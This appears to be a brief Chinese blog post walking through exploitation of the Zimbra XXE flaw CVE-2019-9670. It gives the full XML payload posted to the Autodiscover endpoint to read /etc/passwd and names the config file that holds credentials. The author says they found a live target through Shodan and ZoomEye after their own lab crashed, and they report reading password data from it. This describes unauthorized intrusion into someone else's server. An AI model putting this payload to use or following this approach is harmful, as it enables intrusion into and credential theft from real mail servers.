本地搭建了好久,虚拟机突然蹦了,。。。
上钟馗之眼和shodan找了个目标
第一步,利用了CVE-2019-9670 XXE漏洞来读取配置文件
Zimbra配置文件位置为/conf/localconfig.xml
根据《A Saga of Code Executions on Zimbra》RCE漏洞分析
https://blog.csdn.net/fnmsd/article/details/88657083
Post :/Autodiscover/Autodiscover.xml
内容:
<!DOCTYPE xxe [
<!ELEMENT name ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a">
<Request>
<EMailAddress>aaaaa</EMailAddress>
<AcceptableResponseSchema>&xxe;</AcceptableResponseSchema>
</Request>
</Autodiscover>
成功读到用户密码,说明XXE验证